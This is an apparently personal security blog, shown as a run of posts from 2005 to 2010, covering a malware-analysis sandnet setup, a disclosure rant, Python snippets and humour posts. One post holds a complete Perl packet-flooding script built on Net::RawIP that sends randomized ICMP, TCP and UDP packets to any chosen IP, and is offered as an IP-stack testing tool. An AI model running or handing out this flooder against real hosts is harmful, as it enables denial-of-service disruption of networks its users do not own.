If you change the method to TRACE, it may or may not work, depending on the browser you are using.

To explain the latter item:

The current versions of both Firefox and IE refuse to run TRACE via XMLHttpRequest.
This is the correct behaviour, per the spec, and is certainly more secure (it goes a fair way to mitigate XST in general in fact). I have not tried older versions or other browsers to see how they handle it.

Note that I snarfed bits and pieces of this code from various places on the net, and didn't create all of this from scratch. However, I have tweaked and changed things enough to feel OK calling this "my code".

I'll probably tweak this further. I'm considering just making different buttons for the different types of requests and letting the function figure out what method to use based on that, for example.

Anyway, here's the code as it stands after about 20 minutes of crash course in AJAX:

[EDIT:
if anyone knows how to post HTML/Javascript to blogspot, I'd be grateful for the tip, it keeps trying to render regardless of my use of pre or code. I even tried to settle for textarea, but it borked the formatting of the code unfortunately and added br tags all over the place. *sigh*. ]

Here's a pastebin of the code instead

[EDIT 2010-03-02:
Oh for ... Apparently IE8 renders the pastebin code as HTML instead of displaying it as text/plain. *cry*.

Packet Flooder Script

2008-11-04T11:03:00.003-05:00

I considered for a while whether or not to post this here.
Ultimately I decided to go ahead and do it for a couple of reasons:

1. This isn't anything special, there are myriad similar (or better) tools out there that do the same thing.
2. It is actually useful for testing IP stacks on various devices.

And so, here it is, a perl based packet flood script.
It's got a few things that make it interesting:

1. Ports are chosen randomly for TCP and UDP.
2. ICMP type codes are chosen randomly.
3. TCP flags are chosen randomly.
4. The fragment bit is un/set randomly.

#!/usr/bin/perl -w
# =================================================
# simple network flooder script
# takes type of flood (icmp, tcp, udp) as param
# optionally takes dest ip and packet count
# =================================================
my $VERSION = 0.5;
# =================================================
use strict;
use Net::RawIP;

my $flood = shift or &usage();
my $dstip = shift || '127.0.0.1';
my $pktct = shift || 100;

&icmpflood($dstip, $pktct) if $flood =~ 'icmp';
&tcpflood($dstip, $pktct) if $flood =~ 'tcp';
&udpflood($dstip, $pktct) if $flood =~ 'udp';

sub icmpflood() {
   my($dstip, $pktct, $code, $type, $frag);
   $dstip = shift;
   $pktct = shift;

   print "\nstarting flood to $dstip\n";
   for(my $i=0; $i <= $pktct; $i++) {

      $code = int(rand(255));
      $type = int(rand(255));
      $frag = int(rand(2));

      my $packet = new Net::RawIP({
         ip => {
            daddr => $dstip,
            frag_off => $frag,
         },
         icmp => {
            code => $code,
            type => $type,
         }
      });

      $packet->send;
      print "sent icmp $type->$code, frag: $frag\n";
   }
   print "\nflood complete\n\n";
}

sub tcpflood() {
   my($dstip, $pktct, $sport, $dport, $frag, $urg, $psh, $rst, $fin,
$syn, $ack);
   $dstip = shift;
   $pktct = shift;
   print "\nstarting flood to $dstip\n";
   for(my $i=0; $i <= $pktct; $i++) {

      $sport = int(rand(65535));
      $dport = int(rand(65535));
      $frag = int(rand(2));
      $urg = int(rand(2));
      $psh = int(rand(2));
      $rst = int(rand(2));
      $fin = int(rand(2));
      $syn = int(rand(2));
      $ack = int(rand(2));

      my $packet = new Net::RawIP({
         ip => {
            daddr => $dstip,
            frag_off => $frag,
         },
         tcp => {
            source => $sport,
            dest => $dport,
            urg => $urg,
            psh => $psh,
            rst => $rst,
            fin => $fin,
            syn => $syn,
            ack => $ack,
         }
      });

      $packet->send;
      print "sent tcp packet from $sport to $dport, frag: $frag, psh:
$psh, rst: $rst, fin: $fin, syn: $syn, ack: $ack\n";
   }
   print "\nflood complete\n\n";
}

sub udpflood() {
   my($dstip, $pktct, $sport, $dport, $frag);
   $dstip = shift;
   $pktct = shift;

   print "\nstarting flood to $dstip\n";
   for(my $i=0; $i <= $pktct; $i++) {

      $sport = int(rand(255));
      $dport = int(rand(255));
      $frag = int(rand(2));

      my $packet = new Net::RawIP({
         ip => {
            daddr => $dstip,
            frag_off => $frag,
         },
         udp => {
            source => $sport,
            dest => $dport,
         }
      });

      $packet->send;
      print "sent udp packet from $sport to $dport, frag: $frag\n";
   }
   print "\nflood complete\n\n";
}

sub usage() {
   print "
need to set a valid flood type (one of icmp, tcp, udp)
optionally set dest ip and packetcount

example:

   $0 [tcp udp icmp]  \n\n";
   exit 0;
}

Setting Up A Malware Analysis Sandnet

2008-10-23T07:51:00.005-04:00

A malware analysis sandset is an environment created to allow relatively safe analysis of malicious software samples, which are generally obtained either via a honeynet, or perhaps by reading all the spam one gets and following all the links ;-)

I've been running one for over a year, and figured it was about time to document how I have it set up.

Hosts

Currently there are 2 hosts in the sandnet:

viktim: A Windows XP SP2 host which is deliberately infected for the purposes of analysis

snservices: A Debian Linux host which serves wildcard DNS, as well as running Apache, and providing various other services used to analyze the malware.

viktim

viktim is running XP SP2 (no patches other than the SP) and has 2 hard drives in it.
After installing Windows, I disabled the second hard drive so that the OS doesn't see it. Then I booted up a live Linux distro and used dd to copy the OS drive to the backup one.

The advantage to this is that I can install whatever malware is desired and then simply dd from the backup drive over the infected one to get things back to a clean state.

Note: It takes about 15 minutes to do the dd (they're 9gb drives).

snservices

snservices is running Debian Linux for an OS, and has been configured with a number of tools, including:

BIND

Apache

NMAP

Paketto

ettercap

SpiderMonkey

Architecture

The regular network is protected from the sandnet via a firewall device. I've configured the firewall to log all traffic (logfiles are sent to a remote host via syslog for analysis).

BIND Configuration

BIND has been configured such that it is the SOA for every domain request that it receives, and replies to any requests with the IP address of the snservices host.

viktim has been configured to use snservices as its only DNS server. This allows any DNS calls being made by the viktim host to be observed, and any software that tries to communicate with the internet ends up talking to the snservices box instead.

/etc/bind/named.conf

the default zones for localhost and such have been snipped from the text below


   include "/etc/bind/named.conf.options";
   
   key "dnskey" {
      algorithm hmac-md5;
      secret "hash";
   };
   
   controls {
      inet * allow { 127.0.0.1; } keys { "dnskey"; };
   };
   
   zone "." IN {
      type master;
      file "/etc/bind/db.wildcard";
   };

/etc/bind/db.wildcard


   $TTL   60M
   @   IN   SOA   localhost.  root.localhost (
                           2008022002   ; serial
                                604800  ; refresh
                                 86400  ; retry
                               2419200  ; expire
                                604800) ; negative cache ttl
   ;
                  IN          NS         localhost.
   *              IN           A         192.168.1.3

/etc/bind/named.conf.options


   options {
      directory "/var/cache/bind";
      allow-transfer { none; };
   //    logging {
   //       channel query_log {
   //          severity info;
   //          print-time yes;
   //          file "query.log" versions 5 size 50M;
   //       };
   //       category queries {
   //          query_log;
   //       }
   //   }
      listen-on-v6 { any; };
   };

Analysis

JavaScript De-Obfuscation

For de-obfuscating javascript downloader code there are a couple different methods which can be used. Info on this can be found at this SANS diary entry.

The SpiderMonkey method described there is fairly simple and generally works well. For this reason, SpiderMonkey has been installed and9 configured on the snservices host.

Monitoring and Logging

On snservices

For analyzing network communication from the viktim host, iptables logging can be used. Apache logs can be used to view HTTP requests. Additionally, a netcat listener can be established on whatever port the malware on viktim is attempting to connect to so the conversation can be monitored and/or logged.

On viktim

For analyzing the binaries and behaviors that occur upon infecting the Windows host, a combination of the following is typically used:

strings

wget

Wireshark

PEBrowse Pro

Immunity Debugger

SysAnalyzer

iDefense MAP

netstat

ipconfig

Virtual Machine Environment

For a quick analysis of things that don't appear to require such a complicated setup, a virtual environment can be used.

VM Software

For the purposes of evading detection, the Innotek VirtualBox software was chosen. Most malware at the time of this writing does not check for this particular VM software when determining whether it is being run inside a virtual host (whereas a number of them do check for VMWare). VirtualBox also consumes less resources on the Host OS than VMWare. Both VMWare and Virtualbox are freely downloadable.

Guest OS

A Windows XP SP2 ( again, unpatched except for the SP ) image is run inside the VirtualBox Host.

Tools

The tools used in this environment are largely the same as those on the viktim host described above. Due to the fact that the snservices host is not available to the virtual machine however, some functionality is lost.

This is made up for somewhat by the functions provided by the SysAnalyzer tool and the iDefense MAP suite, however, these are not as robust as the tools available via the snservices host.

----
And there you have it. Maybe not the best sandnet ever made, but I find it fairly sufficient, and flexible enough to do what I need it to do and be easily maintained.

[update 2010-03-02]
I turned this into a talk and presented it at BlackHat DC 2010!

Handy Python Snippets

2008-10-16T10:35:00.010-04:00

Obtaining the local IP address (getip.py)

#!/usr/bin/env python

def getip():
 from socket import gethostbyaddr, gethostname
 theip = gethostbyaddr(gethostname())[2][0]
 return theip

Obtaining the local MAC address (getmac.py)

#!/usr/bin/env python

def getmac():
 import sys, os
 if sys.platform == 'win32':
  for line in os.popen("ipconfig /all"):
   if line.lstrip().startswith('Physical Address'):
    mac = line.split(':')[1].strip().replace('-',':')
    break
 else:
  for line in os.popen("/sbin/ifconfig"):
   if line.find('Ether') > -1:
    mac = line.split()[4]
    break
 return mac

Putting these together (test.py)

#!/usr/bin/env python
import getmac, getip

myip = getip.getip()
mymac = getmac.getmac()

print mymac + " has address: " + myip

About Disclosure

2008-10-02T16:36:00.012-04:00

Let me start off by saying that I wish I had time to sit down and write this in a very concise, coherent manner. Unfortunately, I don't, so instead of a well written post, here's a rapid brain dump.

A couple of researchers (Robert E. Lee and Jack C. Louis) have recently been making a very large amount of press for discovering a new vulnerability in TCP. (see this blog post for a starting point).

The researchers are fairly well respected (among other things, they authored unicornscan, which is a tool that I am quite fond of).

Like Dan Kaminsky and the DNS fiasco not too long ago, they have decided to go with what a colleague of mine accurately referred to as "dribble disclosure", that is, they've said there's a problem, and they've given a large number of interviews giving out bits and pieces of what it may be, how they found it, etc. but they have not come out all the way and said precisely what the issue is.

However, unlike Dan Kaminsky, they've done this *before* any patching of any kind has been released. It was bad enough trying to deal with this type of disclosure *after* vendors had already had a chance to patch, trying to do it without that benefit is insane.

The problem with this type of disclosure is that it leads to a gigantic circus of FUD, both in the media and otherwise. For example, there's some debate in various technical circles as to whether or not they have actually discovered anything new, or whether they've rediscovered older known issues.

I'm giving them the benefit of the doubt and presuming that they have in fact found something new, but without information, who knows? It's all guesswork.

As for the media, I wish it was only the uninformed "mass" media that were spreading unrest and FUD, unfortunately even security researchers are contributing to the festivities.

For example, Robert Hansen (or RSnake as he is known) makes the following statement in his take:

I feel winter slowly coming, and it would be a shame if entire power grids could be taken offline with a few keystrokes, or if supply chains could be interrupted. I hear it gets awfully cold in Scandinavia.

Are you kidding me? We've gone from no details at all to suddenly power grids being knocked offline. Never mind the fact that it's extremely unlikely (read: not gonna happen) that a device which controls the power grid of an area is directly connected to the internet. Devices that display power consumption/usage maybe, but not devices that control where that power is going and whether or not a given path is online.

Fyodor (of nmap fame) has posted his guess on the details of this new vulnerability (and an echo of my frustration at this type of disclosure as well), however Robert E. Lee replies that while Fyodor has very valid points and explains a bit of how their tool works, he doesn't quite explain the attack they've found.

That's one of the points of this rant: Smart people *are* going to figure out what the problem is. They may be "good guys", or they may be "bad guys" (in my opinion it is likely that both sides will figure it out). Either way, there are certainly enough clues given in the various reports/podcasts to enable an individual that is clueful about the protocol to figure out a likely scenario.

To make matters worse, this time there are at least five unique vulnerabilities which have been documented by Robert and Jack. This of course increases the odds that the exploit will be found (that is, someone will figure at least one of the five out, if not all of them.)

So what really is the point of disclosing this way?
It isn't helping anyone except the media and the researchers (because they get to revel in the media circus while it lasts).

More specifically:

It doesn't protect end users

It doesn't help administrators

It doesn't even help security researchers other than those doing the dribbling, because rather than allowing one to try to find ways to fix the problem, or even new ways to apply the problem to other areas, it forces them to try to recreate what's already been done using a disjointed trail of clues.

So, why do it this way?
Disclosure is simple really, either do it, or don't.

Personally, I think "full disclosure" (eg. 'do it') is best.
Whether you do so before or after "responsible" vendor notification, I don't care really. But get all the information out there when you do it, or keep your mouth shut until you're ready to do so.

I'm disgusted with this "new way" of doing things, and I've decided to coin a term for this method: discloscharades

Just like the game charades, this "half informed" nonsense ends up making the person dribbling clues out look silly or worse, and it leaves the people doing the guesswork frustrated and annoyed.

well duh...

2007-11-17T21:52:00.000-05:00

So, I'm printing a doc right now, and notice this helpful tip the printer manufacturer has decided to put into their status screen:

Assure high quality printouts on special media by loading the printable side up.

umm... really?
wtf.

Legal Disclaimer Redux

2007-08-15T19:08:00.006-04:00

So, I got sick of stupid email disclaimers again.

The thing that set me off this time was that this particular disclaimer, after wasting 1.3K and 280 words, actually provided a link to a website and a mailto: so you could view the *full* disclaimer.

WTF?!?

This annoyed me so much, that I felt the need to use the provided mailto and contact the company about the fact that their disclaimer was stupid. Thing is, I forgot to mention the dumbness of providing a link after wasting a ton of time/space with text because there was so much else to pick on.

Here then, is my email to them.
I highly encourage anyone that feels inclined to take this text and use it as a template for your own response to stupid email disclaimers.

Maybe if enough of us bother administration (which impacts the bottom line by wasting *their* time for a change) they'll see the stupidity of the damn things and stop sending them.

right. =/

Received: by 10.114.59.16 with HTTP; Wed, 15 Aug 2007 15:59:34 -0700 (PDT)
Message-ID: <355c7d900708151559j6b8d04b7n792a0ebe05f45484@mail.gmail.com>
Date: Wed, 15 Aug 2007 18:59:34 -0400
From: "Jason Ross" 
To: administrator@xxx.com.au
Subject: a question about the XXX XXXXXXXX email disclaimer
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
Delivered-To: algorythm@gmail.com

Hello. I have just received an email which was sent to a public mailing list, and which contained your company disclaimer at the bottom.

I read the disclaimer with some interest, and have a couple of questions/comments about it.

> The information in this email and any attachments 
> is confidential. If you are not the named 
> addressee you must not read, print, copy, 
> distribute, or use in any way this transmission
> or any information it contains.

I am curious how one is to know what one should do if they are not not the "named adressee" ... as they (according to the disclaimer) should not then be reading the message, nor the disclaimer which is appended to it?

> If you have received this message in error, 
> please notify the sender by return email, 
> destroy all copies and delete it from your
> system.

and then later:

> It is your responsibility to scan this 
> communication and any files attached for computer
> viruses and other defects

Forgive me if I am being obtuse, but does this not grant permission to use the transmission you formerly forbade one to "use in any way"? 

Thanks for taking the time to read this, and I look forward to your response.

Regards,

Jason Ross

btw: yes, i know i wrote "not not the named adressee" ... no need to ask. i never said i was perfect. just not retarded ;-)

one more reason i hate tv

2007-07-24T08:00:00.000-04:00

ok, i'm (almost) willing to accept that, since i have an HDTV, and most of the programming on cable is not yet shown in high-def, i have to deal with things like the stupid banners stations put across the bottom of the screen to tell me about some stupid new show coming up next being 1/3 of the entire screen and covering things i actually may want to see (like subtitles in non-english movies for example...)

but there's a new "feature" of these banner ads being used that is simply not ok. specifically, sound effects.

i'm sorry, but when i am attempting to watch a show, it is simply not acceptable to have a banner pop up in the corner of the screen and start making destructo-electric noises all over the place, making it so that i am unable to hear the dialogue going on.

i'm not sure whom to hate more, the tv executives for giving this interruption the go-ahead, or the advertising flunkies that came up with the idea in the first place.

accordingly, i hate them both.

firefox tips part II

2007-06-28T23:05:00.001-04:00

it turns out that there are some very interesting things hidden in the dom.* section of about:config.

Specifically, there is this handy key which defaults to false, but if set to true is actually a rather beneficial security enhancement:

dom.disable_window_status_change

Setting this to true will prevent javascript from manipulating the status bar. This "feature" is often used in phishing attacks to disguise the real location a given link is referencing. If you set this to true, you will be able to see where you're really going to end up, rather than where the script is programmed to make you think you'll be headed.

For some more reading on the topic, designed around building a custom security policy for firefox suitable for pushing out to end users, check out this article.

time warner can bite me

2007-06-22T12:09:00.001-04:00

i've been playing with 'traceproto' a bit lately.

if you haven't heard of it, it's a nifty tool, which is likely best summarized by the debian package description:

Traceproto is a traceroute replacement written in C that allows the user to specify the protocol and port to trace to. It currently supports TCP, UDP, and ICMP traces with the possibility of others in the future. A network server version is also planned.

so, i decided to see (very informally) how my roadrunner service from time warner cable may be impacting my VoIP service.

here's the results:

trace to tcp/80

hop :  min   /  ave   /  max   :  # packets  :  # lost
-------------------------------------------------------
  1 : 0.76100 / 1.1050 / 1.7550 :   3 packets :   0 lost
  2 : 0.76600 / 0.78167 / 0.80800 :   3 packets :   0 lost
  3 : 1.2240 / 3.4590 / 7.8880 :   3 packets :   0 lost
  4 : 1.0330 / 1.0933 / 1.1680 :   3 packets :   0 lost
------------------------Total--------------------------
total 0.76100 / 1.4859 / 7.8880 :  12 packets :   0 lost

trace to tcp/5061

hop :  min   /  ave   /  max   :  # packets  :  # lost
-------------------------------------------------------
  1 : 0.73500 / 0.94200 / 1.3470 :   3 packets :   0 lost
  2 : 0.80200 / 0.80333 / 0.80400 :   3 packets :   0 lost
  3 : 1.2040 / 1.2520 / 1.2910 :   3 packets :   0 lost
  4 : 0.98400 / 1.0927 / 1.2770 :   3 packets :   0 lost
  5 : 1.2880 / 1.9990 / 3.3890 :   3 packets :   0 lost
  6 : 0.0000 / 0.0000 / 0.0000 :   0 packets :   3 lost
  7 : 14.598 / 14.985 / 15.470 :   3 packets :   0 lost
  8 : 14.341 / 15.993 / 17.198 :   3 packets :   0 lost
  9 : 14.772 / 16.039 / 18.456 :   3 packets :   0 lost
 10 : 21.179 / 27.981 / 34.584 :   3 packets :   0 lost
 11 : 20.403 / 25.081 / 31.883 :   3 packets :   0 lost
 12 : 20.033 / 23.694 / 30.763 :   3 packets :   0 lost
 13 : 28.431 / 29.986 / 32.682 :   3 packets :   0 lost
 14 : 27.798 / 28.413 / 28.807 :   3 packets :   0 lost
 15 : 34.406 / 34.864 / 35.174 :   3 packets :   0 lost
 16 : 37.561 / 40.920 / 42.843 :   3 packets :   0 lost
 17 : 37.916 / 38.145 / 38.337 :   3 packets :   0 lost
 18 : 38.952 / 39.225 / 39.401 :   3 packets :   0 lost
 19 : 39.711 / 41.577 / 42.546 :   3 packets :   0 lost
 20 : 46.463 / 50.698 / 58.449 :   3 packets :   0 lost
------------------------Total--------------------------
total 14.341 / 22.377 / 58.449 :  57 packets :   3 lost

trace to udp/5060

hop :  min   /  ave   /  max   :  # packets  :  # lost
-------------------------------------------------------
  1 : 0.66200 / 0.72800 / 0.78000 :   3 packets :   0 lost
  2 : 0.78300 / 0.83800 / 0.93100 :   3 packets :   0 lost
  3 : 1.2470 / 2.9330 / 6.2640 :   3 packets :   0 lost
  4 : 0.98200 / 0.99433 / 1.0130 :   3 packets :   0 lost
  5 : 1.5360 / 3.6990 / 7.9890 :   3 packets :   0 lost
  6 : 0.0000 / 0.0000 / 0.0000 :   0 packets :   3 lost
  7 : 14.158 / 14.761 / 15.356 :   3 packets :   0 lost
  8 : 16.964 / 20.113 / 24.459 :   3 packets :   0 lost
  9 : 14.521 / 22.357 / 26.446 :   3 packets :   0 lost
 10 : 19.974 / 20.604 / 21.070 :   3 packets :   0 lost
 11 : 19.958 / 20.173 / 20.493 :   3 packets :   0 lost
 12 : 20.204 / 24.639 / 32.201 :   3 packets :   0 lost
 13 : 28.219 / 28.462 / 28.705 :   2 packets :   1 lost
 14 : 28.063 / 28.400 / 28.900 :   3 packets :   0 lost
 15 : 34.316 / 34.737 / 35.148 :   3 packets :   0 lost
 16 : 36.924 / 39.390 / 44.055 :   3 packets :   0 lost
 17 : 37.674 / 38.012 / 38.211 :   3 packets :   0 lost
 18 : 39.119 / 39.444 / 39.718 :   3 packets :   0 lost
 19 : 39.005 / 39.188 / 39.481 :   3 packets :   0 lost
 20 : 0.0000 / 0.0000 / 0.0000 :   0 packets :   3 lost
 21 : 0.0000 / 0.0000 / 0.0000 :   0 packets :   3 lost
 22 : 0.0000 / 0.0000 / 0.0000 :   0 packets :   3 lost
 23 : 0.0000 / 0.0000 / 0.0000 :   0 packets :   3 lost
 24 : 0.0000 / 0.0000 / 0.0000 :   0 packets :   3 lost
------------------------Total--------------------------
total 0.0000 / 15.300 / 44.055 :  53 packets :  19 lost

yeah.
that sucks.

reason #284 why i love "hacker" culture

2007-03-29T19:49:00.000-04:00

from the nmap manual:

If you find yourself really bored one rainy afternoon, try the command nmap -sS -PS80 -iR 0 -p 80 to locate random web servers for browsing.

overkill

2007-03-05T22:33:00.000-05:00

the following may not be true for everyone, but my experience is that it turns out when your wife says:

i would like you to make me a spreadsheet i can use for $foo

she does not instead mean:

i would like you to build me a coldfusion based web
application that connects to a sql server back end database

she really does just want a spreadsheet.
no matter how much more efficient having a database driven web app may be in the long run.

firefox tips part I

2007-02-20T19:29:00.001-05:00

today's wisdom nugget:

in mozilla, go to "about:config"
there's an entry called "browser.blink _allowed", double click it to set it to 'false'
bask in the joy of a not-quite-as-annoying web browsing experience

just remember

2007-02-12T21:27:00.000-05:00

botnets don't DDoS networks ... *people* do...

On UI Design

2007-01-30T09:36:00.001-05:00

there seems to be a new trend in user interface design that i am quickly beginning to hate. it's the replacement of the 'waiting' or 'loading' status bar with something that, rather than showing you how far along in the process you are, simply cycles back and forth a'la KITT's front end grille lights.

an example of such an image can be seen in the stupid image that google gives you while you upload a video to their service.

it's very cute, and friendly, and has the google colors in it. i'm all for that. but it gives the user absolutely zero clue how much of the video has been uploaded, how much more they have to go, nor even a guess as to how long it may take to finish.

(to be fair, google does start giving you a peptalk after you've been waiting a while ['Almost Done!']. whatever. that's not the same, nor as "satisfying". )

i'm starting to see the same thing crop up elsewhere (ubuntu loading screen...)
it's annoying.

i want to see something useful while waiting, at the very least, i want to see something that makes me feel like i'm getting somewhere.

going back and forth makes me feel like i'm just wasting time.

voiding your warranty

2007-01-24T13:20:00.000-05:00

for the record.

when attempting to short pins 16 & 17 on your wrt54GL wireless router, do *not* accidentally cut off pin number 16.

it's just not a good idea.

IPTV ... The Future Is Now, And It Sucks

2007-01-08T22:00:00.001-05:00

so, i just got my beta login to the venice project today.
for those that don't know, it's an iptv product that's been getting some decent word of mouth amongst the community of folks that care about such things.

i must admit, i was pretty psyched. until i "turned it on".

iptv is cool, but it's got a serious drawback, which i think can best be summed up as "phenomenal cosmic powers ... itty bitty living space".

the problem isn't the client. it's remarkably well designed in my opinion. there's some things that it doesn't seem to do which (to me) are a 'natural' way to use something like internet based television (for example, the ability to bookmark a particular show would be nice...), but hey, it's a beta, not all the bugs are worked out, and i've only had it for a day.

i presume therefore that it's entirely likely the functions i'm looking for are there somewhere and i'm just missing them (which of course, could mean that the UI needs a bit of tweaking...)

nor was the problem a lack of bandwidth (for me anyway) .
i'm using roadrunner (via time warner cable) for an ISP, and while they are currently touting their download speed as 10Mbps (i wish!), my connection is doing just fine at a respectable 3.7Mbps. there were a couple of times where the video halted for a second or two, but overall, i was quite impressed with the quality.

no, the problem with iptv, is exactly the same problem as any other kind of tv. there's simply nothing good on.

i flipped through all the channels with nothing catching my eye. so, i began randomly starting videos hoping to find something that sparked an interest. i even managed to find out how to pull up a list of channels i wasn't currently seeing and add them to my available channels so that i could check out the shows on them.

no luck.

there's about 30 or so channels (i didn't take an exact count) ... each channel has at least 2 - 3 shows, some have many more (one nice thing about iptv is that pretty much everything is 'on demand' ... i must admit i've already become quite fond of that).

so, let's say that there's roughly 120 'shows' currently available.
out of those, there was exactly one show that interested me.

most of the available shows were sports/fashion/"spin off of mtv spring break" type drivel, and i recognize that there is a large demographic for those types of shows.

however, i have some serious doubt as to whether the demographic for "likes these types of shows" is the same as the one for "folks likely to be beta testing an iptv product"... i do know that i don't prefer to watch shows in those categories, but admittedly, i'm not your typical 'consumer'.

of course, like i said, this is all new, and beta, and as such, it's very likely that the content will change quite a bit over the next 'X-amount-of-time' as the venture capital starts burning and the pr/marketing folks start spreading the love.

but for now, i'm left wondering if i've seen the future of television, and there's still nothing to watch?

word to the wise

2006-10-04T10:32:00.000-04:00

when you find yourself sitting in your cube with a bagel and cream cheese, and no knife ... do *not* take the pair of rusty scissors, dump purell hand sanitizer on them, wipe them off with a napkin, and use the blade to spread the cream cheese on your bagel.

it's just not very tasty.

it turns out that, if you look inside the bag with your bagel, there's a knife.

you just won't find that out until you crumple the bag up to throw it away after finishing and stab yourself.

good luck

2006-10-03T16:55:00.000-04:00

not sure why, but for some reason, this pretty much sums up microsoft for me

nifty obsd stuff

2006-09-06T08:25:00.000-04:00

ok, i'm switching to openbsd for my firewall based completely on the fact that they have songs

my favorite ones are:
ponderosa puff
"CARP license" & "redundancy must be free"

i don't care at all about the fact that it's (perceived to be) more secure than linux, nor that the ip stack is (theoretically) better. they have cool songs, so i'm switching.

Terms of Service

2006-05-25T20:51:00.000-04:00

So, I've been using Vonage for my phone (landline) for the past 2 years or so, and I have been pretty happy with the service they provide. However, I am currently shopping for a new VoIP provider.

I'm not doing this because I want cheaper service, nor am I doing it because Vonage outsources their tech support and the quality of said support is shoddy at best (though those things are in fact good reasons to switch in my opinion.)

I am leaving because I want to play with asterisk and because Vonage only provides a locked ATA I am unable to do so while using their services for VoIP. (Yes, I know I can pay extra to get the soft phone and use the resulting SIP credentials to configure asterisk to work with Vonage; the point isn't that there's a workaround, the point is Vonage discourages its customers from using the VoIP service they have paid for in the manner that best suits them.)

So, as I've been shopping around, I discovered ViaTalk. This company seems to have the services I'm looking for (flat monthly fee for unlimited US calling [I hate the per minute thing], call forwarding, voice mail, etc) at a price that is actually better than what I currently have with Vonage (about half the cost if I sign up for the 12 month plan.) Even better, they have a BYOD (“Bring Your Own Device”) plan specifically designed for folks that have asterisk or similar needs.

Of course, I’m not one to just jump at the first thing that comes along, so I did a bit of research, and the general consensus amongst the net folk seems to be that ViaTalk is a decent provider, with very good customer support. A bit rough around the edges perhaps, but working hard to make things smooth (in fairness, they just ended the ‘beta’ version of their service last month). However, I noticed that even the folks which were talking about the “rough spots” were also talking about how impressed they were with the customer support ViaTalk showed.

All in all, it sounded like a great deal. Being a geek, I don’t mind ‘a bit rough around the edges’, and am willing to live with needing to bounce the router every now and then to accommodate whatever changes have been made. (Especially since [in theory] now that the service is no longer beta this shouldn’t be much of an issue …)

As part of my research, I even initiated a conversation with a ViaTalk Sales Rep using their online chat feature, and was very impressed with the knowledge, and most of all the genuine *humanness*, that I encountered. It was very refreshing.

Just when I was convinced to go ahead and make the switch, I found a post on DSLReports which warned about the ViaTalk Terms of Service. Specifically, there is a line which reads:

ViaTalk may update this agreement at any time without notice and you are agreeing to such changes in advance.

Now, I don’t know anyone, much less any geeks, who think that sounds fair. I can’t imagine any other type of binding document outside the software/tech industry which says “we can change this any time we feel like it, and you agree right now that whatever we say goes”. I asked a few of my friends (also geeks) what they thought about it, and we were all in agreement:

It’s ridiculous, and evil.

Because of that one line, I’ve decided to wait a bit and see if I can find a VoIP provider which offers what I’m looking for at a price that’s right, and doesn’t have that type of line it their Terms of Service. However, I keep going back to ViaTalk, mostly because I’m having a tough time finding another company that seems stable (read, not fly-by-night and just jumping on the VoIP bandwagon cause it’s a Venture Capitalist buzzword of the day).

So, I decided to contact ViaTalk again, using their web based chat once more. The main goal of this conversation (from my point of view) was to simply let them know that I was very interested in their products, but that their Terms of Service agreement was keeping me away.

I spoke to a very nice representative, and stated the above right away. I also mentioned the fact that (in my opinion) VoIP is still a ‘geeks playground’ really, and that geeks tend to notice things like Terms of Service. I brought up the point that if I was discussing this with my friends, it was likely that others were as well, and that I had in fact discovered the offending line as a result of a posting to a web site where customers discuss their experiences with VoIP providers.

To my delight, the sales rep actually said:

I apologize for our ‘evil’ terms of service.

I mean, come on, if I hadn’t yet decided that I liked the way ViaTalk handled themselves, the sales rep saying that absolutely would have convinced me that they were the right choice.

Not getting the runaround and a bunch of stupid corporate rhetoric earned them a whole lot of points in my book. (This of course brings up the possibility that perhaps geeks have a different standard than the average consumer when ascertaining whether a given company is ‘right’ for their needs …)

I explained to the Sales Rep that is was quite alright, and really I was just looking to let someone know that, while I understand why they have that line there, at least one potential customer was still looking elsewhere because of it. Their representative told me that they had passed my concern on to their supervisor, and we ended the conversation on a positive note.

Now, I bring this up, not because I wish to cast ViaTalk in a bad light for their Terms of Service. I am still extremely impressed with the interaction I’ve had with the company thus far. I am bringing all this up because of what I found today when, out of curiosity, I started looking at the Terms of Service other tech companies have :

Although we may attempt to notify you via your Gmail address when major changes are made, you should visit this page periodically to review the terms. Google may, in its sole discretion, modify or revise these terms and conditions and policies at any time, and you agree to be bound by such modifications or revisions.

Yep, that’s correct. The above statement, which is almost exactly the same as the ViaTalk one, is from none other than Google’s Gmail Terms of Service agreement!

Now, Google is beloved by geeks everywhere, and they are well known in the geek community for their motto “don’t be evil” (in reality, the motto is “You can make money without doing evil.” according to the Ten Things page of the Google website.) How is it that such an evil line can slip into the Terms of Service of a product so widely used by geeks (and many others) without causing a stir?

I don’t have an answer to that. But I am now forced to reconsider whether the right course of action for me to take is to stick with my principles and refrain from using Gmail as well as ViaTalk because of that line, or surrender and sign up with ViaTalk because hey, I've already agreed to a similar line elsewhere.

I don’t really have an answer to that question yet either.

Legal Disclaimer

2005-05-16T15:13:00.001-04:00

So, I'm sick of reading emails that contain legal disclaimers at the bottom of them. More accurately, I'm sick of the legal paranoia we all live in that makes companies/individuals feel that having these disclaimers is important.

In retaliation (futile, but I feel better) I've crafted one of my own devising. My favorite part is that it's so huge. Most of the emails I get are simple one or 2 line things ("hey, check this link out", "blah", or "i hate everyone, people suck", etc)

This disclaimer will simply drown out the text of the actual message, and significantly increase the size of the message (significantly, if you're a mail router receiving hundreds of these a second [or more])

Anyway, here it is. Enjoy.

IMPORTANT WARNING:
The presence of this message on your mail system indicates an awareness and acceptance of the terms and conditions of this warning.

This message is intended solely for the use of the person or entity to which it is addressed and may contain information that is privileged and confidential, the disclosure of which is fully governed by aplicable law. In the event that no law is applicable to govern the disclosure of this message, one will be created at the discretion of the legal rights holder of the contents of the message.

If the reader is not the intended recipient (or the employee or agent responsible for delivering it to the intended recipient) you are hereby notified that you are not the intended recipient, and therefore not entitled to the use of this message.

In the event that you are the employee or agent responsible for delivering it to the intended recipient, you are entitled to the use of this message solely for the purpose of delivering it to the intended recipient.

ANY dissemination, distribution or copying of this information is STRICTLY PROHIBITED, including the dissemination, distribution, or copying of this warning; even for the purposes of verifying the legal validity of the claims made herein. Included in "dissemination", "distribution", and "copying" are the acts of "forwarding" the message to other parties, as well as "replying" to it.

If you have received this message in error, please notify us immediately, by sending an email to thoughtpolice@miniluv.gov and destroy the related message.

Thank You for your cooperation.

Use and Useability

2005-05-14T01:03:00.002-04:00

so, i've recently come to (what is to me) a brilliant realization.

information that is not readable, is not useful.

now, you may be saying "well, duh" (and it's OK if you are) but now that you've mocked my intelligence, try this.

start paying attention to how readable the sites you're visiting on the web are.

do you have to close 50 pop up ads to find the article you're trying to see?

